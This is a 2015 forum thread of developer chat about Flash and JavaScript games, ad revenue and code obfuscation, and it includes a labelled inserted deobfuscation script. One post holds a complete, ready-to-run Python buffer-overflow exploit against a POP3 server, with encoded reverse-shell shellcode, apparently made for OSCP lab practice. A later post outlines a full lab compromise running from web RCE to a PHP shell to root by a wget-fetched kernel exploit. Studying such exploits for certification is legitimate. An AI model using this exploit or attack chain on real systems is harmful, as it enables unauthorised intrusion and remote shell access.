The Flash 'Reg' Lounge

2,878,314 Views | 60,179 Replies

Response to The Flash 'Reg' Lounge 2015-05-05 21:08:02 (edited 2015-05-05 21:12:14)


I'm writing a scripting language for my AI, and now I understand and appreciate why some languages require specific tabbing, goto, and "endif" and all that (it's easier). I'm also very familiar with stacks now.

Edit: seeing my code outside of FD lets me see bugs more easily it seems...issue with elseif.

Response to The Flash 'Reg' Lounge 2015-05-12 20:53:17


Invisible Inc just came out today on Steam, and I highly recommend it. It's a stealth strategy/tactics game. I like it because if you get caught, it's not a dumb fight sequence and then you're running a mile to get out of the enemy's patrol radius.

Also I found Zenzizenzic on early access. Super fun super hard shmup with great music.

Response to The Flash 'Reg' Lounge 2015-05-13 21:20:23


At 3/31/15 05:12 AM, egg82 wrote:
Hold me, I'm drunk

You're over 21 now?

(I don't know, I just came back to NG)

Response to The Flash 'Reg' Lounge 2015-05-20 02:44:39


At 5/13/15 09:20 PM, FlyingColours wrote: You're over 21 now?

22 or 23 now, I can't quite remember. I think I'm 22.

I've been gone a while. Just getting shit done :P

I work at Elitch Gardens now, so that's a thing

Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-05-24 04:45:52


At 5/20/15 02:44 AM, egg82 wrote:
At 5/13/15 09:20 PM, FlyingColours wrote: You're over 21 now?
22 or 23 now, I can't quite remember. I think I'm 22.

LOL, forgetting your age is a pretty drunk thing to do :P

(Speaking of which, have I told you how old I am? I think MintPaw and a few other NGers know, but I can't remember if I've told you.)


I've been gone a while. Just getting shit done :P
I work at Elitch Gardens now, so that's a thing

Cool! What do you do there?

Response to The Flash 'Reg' Lounge 2015-05-24 04:47:31


In other news, I'm returning to my RPG to fix the music, but I can't remember what exactly the problem that tripped me up was. It's something related to playing music in Chrome, certainly.

I'm scr*wed

Response to The Flash 'Reg' Lounge 2015-05-24 12:45:59


At 5/24/15 04:45 AM, FlyingColours wrote: (Speaking of which, have I told you how old I am? I think MintPaw and a few other NGers know, but I can't remember if I've told you.)

Like 19 or 20?

Response to The Flash 'Reg' Lounge 2015-05-24 13:21:46


At 5/24/15 12:45 PM, MSGhero wrote:
At 5/24/15 04:45 AM, FlyingColours wrote: (Speaking of which, have I told you how old I am? I think MintPaw and a few other NGers know, but I can't remember if I've told you.)
Like 19 or 20?

I am younger than you were when I first met you.

Response to The Flash 'Reg' Lounge 2015-05-24 13:22:40


At 5/24/15 04:47 AM, FlyingColours wrote: In other news, I'm returning to my RPG to fix the music, but I can't remember what exactly the problem that tripped me up was. It's something related to playing music in Chrome, certainly.

I'm scr*wed

Update. I've finally understood my old code, and what's more, I've fixed everything. Yay!

Now for volume control.

Response to The Flash 'Reg' Lounge 2015-05-24 15:11:48


I work in food service, yay.

In other news, I'm currently studying for my OSCP. Wish me luck!


Response to The Flash 'Reg' Lounge 2015-05-24 20:57:05


At 5/24/15 03:11 PM, egg82 wrote: I work in food service, yay.

Sorry.

In other news, I'm currently studying for my OSCP. Wish me luck!

Good luck!

Response to The Flash 'Reg' Lounge 2015-05-25 10:05:51


Added SFX to Xirang!

Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.

Response to The Flash 'Reg' Lounge 2015-05-25 10:46:14


At 5/25/15 10:05 AM, FlyingColours wrote: Added SFX to Xirang!

Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.

Sounds like you need to tone the volume down lol.

Response to The Flash 'Reg' Lounge 2015-05-25 11:03:43


At 5/25/15 10:46 AM, MSGhero wrote:
At 5/25/15 10:05 AM, FlyingColours wrote: Added SFX to Xirang!

Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.
Sounds like you need to tone the volume down lol.

Awww.... I love it though! It happens at the exact moment where the loading doors open to reveal a gate, and is totally Hollywoody... It even matches the Beethoven in the background!

Response to The Flash 'Reg' Lounge 2015-05-25 11:19:33


You know, do you guys think it's good enough for Tom to sponsor it?

(Flashads don't work in the game, obviously...)

I'll be very happy to put up huge Tankman posters on the loading screen (which appears whenever the player changes location), and I'm working on adding medals.

Response to The Flash 'Reg' Lounge 2015-05-25 11:49:24


At 5/25/15 11:19 AM, FlyingColours wrote: You know, do you guys think it's good enough for Tom to sponsor it?

(Flashads don't work in the game, obviously...)

I think you still get preroll and page ads.

Response to The Flash 'Reg' Lounge 2015-05-25 12:10:20


At 5/25/15 11:49 AM, MSGhero wrote:
At 5/25/15 11:19 AM, FlyingColours wrote: You know, do you guys think it's good enough for Tom to sponsor it?

(Flashads don't work in the game, obviously...)
I think you still get preroll and page ads.

They seem to be much less effective than in-game adverts though...

Since you have had games frontpaged before, do you think that is the case?

Response to The Flash 'Reg' Lounge 2015-05-25 14:57:55


#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
overflow = "\x90" * 2606 # Create the buffer overflow
EIP = "\x8F\x35\x4A\x5F" # JMP ESP in SLMFC.dll (x86, little endian)
swap = "\x90" * 16 # Stack space for decoding
shell = ("\xdd\xc0\xb8\x6f\x1b\x9d\x92\xd9\x74\x24\xf4\x5a\x2b\xc9" +
"\xb1\x4f\x31\x42\x19\x83\xea\xfc\x03\x42\x15\x8d\xee\x61" +
"\x7a\xd8\x11\x9a\x7b\xba\x98\x7f\x4a\xe8\xff\xf4\xff\x3c" +
"\x8b\x59\x0c\xb7\xd9\x49\x87\xb5\xf5\x7e\x20\x73\x20\xb0" +
"\xb1\xb2\xec\x1e\x71\xd5\x90\x5c\xa6\x35\xa8\xae\xbb\x34" +
"\xed\xd3\x34\x64\xa6\x98\xe7\x98\xc3\xdd\x3b\x99\x03\x6a" +
"\x03\xe1\x26\xad\xf0\x5b\x28\xfe\xa9\xd0\x62\xe6\xc2\xbe" +
"\x52\x17\x06\xdd\xaf\x5e\x23\x15\x5b\x61\xe5\x64\xa4\x53" +
"\xc9\x2a\x9b\x5b\xc4\x33\xdb\x5c\x37\x46\x17\x9f\xca\x50" +
"\xec\xdd\x10\xd5\xf1\x46\xd2\x4d\xd2\x77\x37\x0b\x91\x74" +
"\xfc\x58\xfd\x98\x03\x8d\x75\xa4\x88\x30\x5a\x2c\xca\x16" +
"\x7e\x74\x88\x37\x27\xd0\x7f\x48\x37\xbc\x20\xec\x33\x2f" +
"\x34\x96\x19\x38\xf9\xa4\xa1\xb8\x95\xbf\xd2\x8a\x3a\x6b" +
"\x7d\xa7\xb3\xb5\x7a\xc8\xe9\x01\x14\x37\x12\x71\x3c\xfc" +
"\x46\x21\x56\xd5\xe6\xaa\xa6\xda\x32\x7c\xf7\x74\xed\x3c" +
"\xa7\x34\x5d\xd4\xad\xba\x82\xc4\xcd\x10\xb5\xc3\x5a\x5b" +
"\x6e\xc5\x47\x33\x6d\xd9\x76\x7f\xf8\x3f\x12\x6f\xad\xe8" +
"\x8b\x16\xf4\x62\x2d\xd6\x22\xe2\xce\x45\xa9\xf2\x99\x75" +
"\x66\xa5\xce\x48\x7f\x23\xe3\xf3\x29\x51\xfe\x62\x11\xd1" +
"\x25\x57\x9c\xd8\xa8\xe3\xba\xca\x74\xeb\x86\xbe\x28\xba" +
"\x50\x68\x8f\x14\x13\xc2\x59\xca\xfd\x82\x1c\x20\x3e\xd4" +
"\x20\x6d\xc8\x38\x90\xd8\x8d\x47\x1d\x8d\x19\x30\x43\x2d" +
"\xe5\xeb\xc7\x5d\xac\xb1\x6e\xf6\x69\x20\x33\x9b\x89\x9f" +
"\x70\xa2\x09\x15\x09\x51\x11\x5c\x0c\x1d\x95\x8d\x7c\x0e" +
"\x70\xb1\xd3\x2f\x51") # msfpayload windows/shell_reverse_tcp LHOST=192.168.14.221 LPORT=443 R | msfencode -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
padding = "\x90" * (3500 - 2606 - 4 - 16 - 341) # Stack padding, 3500 bytes total - buffer overflow - EIP - swap space - shell payload

try:
        print "\nSending buffer.."
        s.connect(("192.168.15.70", 110))
        data = s.recv(1024)
        s.send("USER username\r\n")
        data = s.recv(1024)
        s.send("PASS " + overflow + EIP + swap + shell + padding + "\r\n")
        print "Done!"
except:
        print "Could not connect!"

I rode a buffer overflow into a reverse shell with python, I feel kinda badass :D



Response to The Flash 'Reg' Lounge 2015-05-25 15:42:16 (edited 2015-05-25 15:49:45)


At 5/25/15 12:10 PM, FlyingColours wrote: Since you have had games frontpaged before, do you think that is the case?

At 43k portal ads each and 139/68k flash ads and 2.5/10k preroll ads, flash ads have portal ads beat by only $10. Portal ads have the biggest ecpm (>$4), flash ads have less than half, and preroll are like 2/3 3/4 portal ads.

Response to The Flash 'Reg' Lounge 2015-05-25 21:21:06


At 5/25/15 03:42 PM, MSGhero wrote:
At 5/25/15 12:10 PM, FlyingColours wrote: Since you have had games frontpaged before, do you think that is the case?
At 43k portal ads each and 139/68k flash ads and 2.5/10k preroll ads, flash ads have portal ads beat by only $10. Portal ads have the biggest ecpm (>$4), flash ads have less than half, and preroll are like 2/3 3/4 portal ads.

Ah, I see. They're not so bad then.

Also, I think I'm gonna put up links to my userpage and gain a little from that.

By the way, do you think I should obfuscate the code before I publish?

I'm not sure why anyone would steal my code though. Some of the code I added late in the development process is pretty spaghetti 'cos I know I'll rewrite the engine if I make a sequel.

Response to The Flash 'Reg' Lounge 2015-05-25 21:24:43


At 5/25/15 09:21 PM, FlyingColours wrote: By the way, do you think I should obfuscate the code before I publish?

I'm not sure how js works, but it's not worth it for flash. No one really cares about your code. I guess it wouldn't hurt. Haxe's output is a terrible thing to look through on any platform... people who encounter obfuscated code would probably quit after 45 seconds.

Response to The Flash 'Reg' Lounge 2015-05-26 04:30:33


Security through obscurity is not security at all.



Response to The Flash 'Reg' Lounge 2015-05-26 08:14:37


At 5/25/15 09:21 PM, FlyingColours wrote: By the way, do you think I should obfuscate the code before I publish?

Yes. Minify it, too.

At 5/26/15 04:30 AM, egg82 wrote: Security through obscurity is not security at all.

Why not? It's certainly not the best, but it definitely secures your code from at least a portion of people and, considering no security method is 100% effective, the fact it does something at the very least makes it a security measure.

It's your best (and as far as I can think, only) for client side JavaScript.

Response to The Flash 'Reg' Lounge 2015-05-26 09:28:19 (edited 2015-05-26 09:28:55)


Okay... If Sam says to do it, then I'll do it.

Of course I'm going to minify! I have to make up for that embarrassing code copy-pasting that I don't want anyone to know about.

Speaking of which, I'll have to fix two minor bugs, add in volume control, add the Tankman posters anyway, make fancy scrollbars and possibly a fancy cursor, test the remaining medals, and I'm all set. Probably.

What do you think about the icon?

Edit: Wow, I can edit now! This is such a touching moment.

Response to The Flash 'Reg' Lounge 2015-05-27 01:13:39


At 5/26/15 08:14 AM, Sam wrote: Why not? It's certainly not the best, but it definitely secures your code from at least a portion of people and, considering no security method is 100% effective, the fact it does something at the very least makes it a security measure.

It's your best (and as far as I can think, only) for client side JavaScript.

Most decompilers have built-in deobf for many common languages.
Also you can just use debuggers..
Or, ya know, not. Because some 16-year-old's game code isn't worth it unless there's MySQL information hardcoded in there or something. In which case, we're back to deobf and some quick string searches. (though honestly you wouldn't need deobf for that)

If you want to screw with JS, there's easier ways as well.

Obfuscation offers a weak solution to a (virtually) nonexistent problem.



Response to The Flash 'Reg' Lounge 2015-05-27 07:19:40


At 5/27/15 01:13 AM, egg82 wrote: Obfuscation offers a weak solution to a (virtually) nonexistent problem.

It takes a grand total of 30 seconds to paste your code into an obfuscator. The trade off is worth it, in almost every case. Out of interest, I looked up a "deobfuscator", ripped their source, obfuscated it, and then used their tool to deobfuscate:

Original Source
Obfuscated -> Deobfuscated

I realise some may be better than others and the method of obfuscation affects the output, but I certainly wouldn't want to trawl through that code to find something. It at least deters a group of people from having access to your source code in a readable and usable format.

Basically, I see no reason not to.

Response to The Flash 'Reg' Lounge 2015-05-27 08:42:42


At 5/27/15 01:13 AM, egg82 wrote: Most decompilers have built-in deobf for many common languages.
Also you can just use debuggers..
Or, ya know, not. Because some 16-year-old's game code isn't worth it

Actually, I'm 17 now and will be 18 in a few months. I've grown :P

unless there's MySQL information hardcoded in there or something. In which case, we're back to deobf and some quick string searches. (though honestly you wouldn't need deobf for that)

Why would anyone do that in JS?

Response to The Flash 'Reg' Lounge 2015-05-29 00:55:59


At 5/27/15 07:19 AM, Sam wrote: Original Source
Obfuscated -> Deobfuscated

You forgot the unescape option, which turns the top array of hex values into this:

var _0xc5a6 = ["", "space_after_anon_function", "jslint_happy", "braces_on_own_line", "expand", "collapse", "brace_style", "indent_size", "indent_char", " ", "preserve_newlines", "undefined", "max_preserve_newlines", "keep_array_indentation", "space_before_conditional", "indent_case", "length", "pop", "\x0A", "\x0D", "replace", "indexOf", "substring", "push", "eat_next_space", "mode", "if_line", "indentation_level", "var_line", "var_line_reindented", "case_body", "TK_COMMENT", "BLOCK", "[EXPRESSION]", "[INDENTED-EXPRESSION]", "(EXPRESSION)", "(FOR-EXPRESSION)", "(COND-EXPRESSION)", "DO_BLOCK", "previous_mode", "charAt", "case", "return", "do", "if", "throw", "else", "TK_EOF", "\x09", "indentation_baseline", "match", "-", "+", "TK_WORD", "in", "TK_OPERATOR", "TK_EQUALS", "var", "(", "[", "TK_START_EXPR", ")", "]", "TK_END_EXPR", "{", "TK_START_BLOCK", "}", "TK_END_BLOCK", ";", "TK_SEMICOLON", "/", "*", "/*", "*/", "TK_INLINE_COMMENT", "TK_BLOCK_COMMENT", "\'", "\"", "\\", "TK_STRING", "#", "!", "=", "[]", "{}", "<", "<!--", "in_html_comment", "-->", "TK_UNKNOWN", "split", "\x0A\x0D\x09 ", "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$", "0123456789", "+ - * / % & ++ -- = += -= *= /= %= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! !! , : ? ^ ^= |= ::", ",", "continue,try,throw,return,var,if,switch,case,default,for,while,break,function", "for", "while", ".", "function", "typeof", "catch", "expand-strict", "default", "in_case_statement", ":", "in_case", "NONE", "toLowerCase", "finally", "NEWLINE", "end-expand", "SPACE", "get", "set", "new", "var_line_tainted", "OBJECT", "::", "--", "++", "ternary_depth", "?", "slice", "join", "js_beautify", "value", "text", "getElementById", "eval", "write", "writeln", "createPopup", "createElement", "Syntax Error:\x0A", "message", "alert", "Paste code here...", "script"];

You can then make a quick script that gets the values from that array and puts them back into whatever variables are using them. Then if you want to you can modify the function variables to be just x2, x3, etc. instead of _0xeed0x2, _0xeed0x3, etc. It'll be much easier to read, then.
Again, assuming you want to put the effort into it. If you don't, then you didn't really want to do it in the first place.

True, though. I suppose if it only takes a minute then go for it. Just don't lose your source code or you'll get to go back through your obfuscated AND decompiled code.


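The "quick script" described in the post above, sketched as an added example (not code from the thread or from any tool mentioned in it). It assumes the obfuscator emitted one `var _0x… = [...]` table of double-quoted strings and `_0x…0xN` identifiers; `decodeLiteral`, `deobfuscate` and `SAMPLE` are names and input constructed for the illustration.

```javascript
// Added example: static clean-up of string-array obfuscation.
// Nothing from the sample is eval'd; string literals are decoded by hand.

// Decode the escapes found inside a double-quoted JS string literal body.
function decodeLiteral(body) {
  const simple = { n: "\n", r: "\r", t: "\t", b: "\b", f: "\f", v: "\v", 0: "\0" };
  return body.replace(/\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([\s\S]))/g,
    (m, hex, uni, ch) => {
      if (hex || uni) return String.fromCharCode(parseInt(hex || uni, 16));
      return ch in simple ? simple[ch] : ch; // \" \\ \' decode to themselves
    });
}

function deobfuscate(src) {
  // 1. Locate the lookup table: var _0xNAME = ["...", "..."];
  const decl = /var\s+(_0x[0-9a-f]+)\s*=\s*\[((?:\s*"(?:[^"\\]|\\[\s\S])*"\s*,?)*)\]\s*;?/i.exec(src);
  if (!decl) return src; // not this obfuscation scheme, leave untouched
  const [whole, name, list] = decl;
  const table = (list.match(/"(?:[^"\\]|\\[\s\S])*"/g) || [])
    .map((lit) => decodeLiteral(lit.slice(1, -1)));

  let out = src.replace(whole, "");
  // 2. Put each value back where the table was indexed (decimal or hex index).
  const ref = new RegExp(name + "\\[(0x[0-9a-f]+|\\d+)\\]", "gi");
  out = out.replace(ref, (m, idx) => {
    const i = Number(idx);
    return i < table.length ? JSON.stringify(table[i]) : m; // keep bad indexes visible
  });
  // 3. Shorten generated identifiers: _0xeed0x2 -> x2.
  //    Assumes no existing identifier is already called x2, x3, ...
  out = out.replace(/\b_0x[0-9a-f]+0x([0-9a-f]+)\b/gi, "x$1");
  return out.trim();
}

// Constructed sample in the style of the array quoted in the post.
const SAMPLE = [
  'var _0xc5a6 = ["\\x6C\\x65\\x6E\\x67\\x74\\x68", "\\x70\\x75\\x73\\x68", "\\x0A"];',
  "function _0xeed0x1(_0xeed0x2, _0xeed0x3) {",
  "  if (_0xeed0x2[_0xc5a6[0]] > 0) { _0xeed0x3[_0xc5a6[0x1]](_0xc5a6[2]); }",
  "}",
].join("\n");

console.log(deobfuscate(SAMPLE));
```

The same pass is what makes hardcoded credentials or endpoints in an obfuscated client script show up in a plain string search, which is why they do not belong in client-side code in the first place.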

Response to The Flash 'Reg' Lounge 2015-06-01 03:10:53


Phoenix down!

Web fuzzer got robots.txt
Manually opened robots.txt to discover hidden /internal directory
View->Source to discover web page is a custom front-end for a system called "Advanced Comment System"
Google search revealed remote code execution exploit
Got PHP shell with apache permissions
uname showed kernel version compatible with 2009-2692 local privilege escalation exploit and fstab showed executable /tmp directory
compiled c executable on attacking machine, hosted on attacking http server, and wget to /tmp
executed, root acquired

Ka-boom.

The programmer in me is cringing at all the code I smashed into 8 bytes of memory


Response to The Flash 'Reg' Lounge 2015-06-04 18:54:47


At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency

The hell did I just read.. ?

